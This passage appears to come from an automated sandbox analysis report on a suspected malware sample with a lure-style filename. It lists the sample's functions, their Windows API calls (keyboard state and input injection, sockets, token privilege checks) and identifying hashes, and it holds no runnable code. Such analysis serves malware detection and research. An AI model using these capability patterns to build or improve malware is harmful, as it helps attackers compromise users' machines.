                                                        • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                        • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                        Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 004780C3
                                                        • CoUninitialize.OLE32 ref: 004780CE
                                                          • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 004780D9
                                                        • VariantClear.OLEAUT32(?), ref: 004783AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                        • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                        • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                        • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                        Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                        • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                        • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                        • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                        Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                        • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                        • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                        • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                        Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                        • _strlen.LIBCMT ref: 004764D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: c4fdb5f2704758831fff94e23a426246860f5a4f667fed73e25f1c1d97e4656e
                                                        • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                        • Opcode Fuzzy Hash: c4fdb5f2704758831fff94e23a426246860f5a4f667fed73e25f1c1d97e4656e
                                                        • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                        Function 016B34FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 016B354C
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 016B35D5
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 016B35E7
                                                        • __freea.LIBCMT ref: 016B35F0
                                                          • Part of subcall function 016B32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 016B332C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 5058cfc357ae8b68e70c8ea84dc9b89a461a6f7d4cd82a9d306ee12c4f2d2b24
                                                        • Instruction ID: 97406350188dc3e12b89d4ec25cf0cbcfb5279de8f23cd0806f379560ee744a1
                                                        • Opcode Fuzzy Hash: 5058cfc357ae8b68e70c8ea84dc9b89a461a6f7d4cd82a9d306ee12c4f2d2b24
                                                        • Instruction Fuzzy Hash: D631CF72A0021AABEF259F68DCC4DEF7BA6EF40210F054168EC04DB350EB35C990CB90
                                                        Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                        • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                        • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                        • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                        Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                        • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0048AC57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                        • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                        • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                        • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                        Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                        • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                        • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                        • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                        Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                        • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                        • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                        • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                        Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                        • __isleadbyte_l.LIBCMT ref: 00436229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                        • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                        • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                        • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                        Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00484F02
                                                          • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                          • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                          • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                        • GetCaretPos.USER32(?), ref: 00484F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                        • GetForegroundWindow.USER32 ref: 00484F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                        • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                        • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                        • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                        Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetCursorPos.USER32(?), ref: 0048C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                        • GetCursorPos.USER32(?), ref: 0048C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                        • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                        • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                        • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                        Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                          • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                          • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                          • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                        • _memcmp.LIBCMT ref: 004586C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00458703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                        • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                        • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                        • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                        Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __setmode.LIBCMT ref: 004209AE
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                        • _fprintf.LIBCMT ref: 004209E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                          • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                        • __setmode.LIBCMT ref: 00420A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
